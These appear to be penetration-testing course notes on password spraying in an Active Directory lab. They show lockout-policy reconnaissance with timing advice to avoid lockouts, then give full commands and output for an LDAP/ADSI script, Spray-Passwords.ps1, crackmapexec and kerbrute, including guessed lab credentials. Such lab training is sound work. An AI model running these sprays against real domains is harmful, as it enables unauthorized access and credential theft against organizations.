Password Spray Attacks
Execute net accounts to obtain the account policy.
PS C:\Users\root> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.Lockout threshold, which indicates a limit of five login attempts before lockout. This means we can safely attempt four logins before triggering a lockout. Although this may not seem like many, we should also consider the Lockout observation window, which indicates that after thirty minutes after the last failed login, we can make additional attempts.
LDAP and ADSI password spraying attack
The first kind of password spraying attack uses LDAP and ADSI to perform a low and slow password attack against AD users. In the Module Active Directory Introduction and Enumeration, we performed queries against the domain controller as a logged-in user with DirectoryEntry. However, we can also make queries in the context of a different user by setting the DirectoryEntry instance.
Manual Script
PS C:\Users\jeff> $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PS C:\Users\jeff> $PDC = ($domainObj.PdcRoleOwner).Name
PS C:\Users\jeff> $SearchString = "LDAP://"
PS C:\Users\jeff> $SearchString += $PDC + "/"
PS C:\Users\jeff> $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
PS C:\Users\jeff> $SearchString += $DistinguishedName
PS C:\Users\jeff> New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")We could use this technique to create a PowerShell script that enumerates all users and performs authentications according to the Lockout threshold and Lockout observation window.
Spray-Passwords.ps1
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> powershell -ep bypass
...
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'
Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'crackmapexec
kali@kali:~$ cat users.txt
dave
jen
pete
kali@kali:~$ crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [-] corp.com\dave:Nexus123! STATUS_LOGON_FAILURE
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\jen:Nexus123!
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\pete:Nexus123!
kali@kali:~$ crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\dave:Flowers1 (Pwn3d!)
kerbrute
PS C:\Tools> type .\usernames.txt
pete
dave
jen
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/06/22 - Ronnie Flathers @ropnop
2022/09/06 20:30:48 > Using KDC(s):
2022/09/06 20:30:48 > dc1.corp.com:88
2022/09/06 20:30:48 > [+] VALID LOGIN: jen@corp.com:Nexus123!
2022/09/06 20:30:48 > [+] VALID LOGIN: pete@corp.com:Nexus123!
2022/09/06 20:30:48 > Done! Tested 3 logins (2 successes) in 0.041 secondsLast updated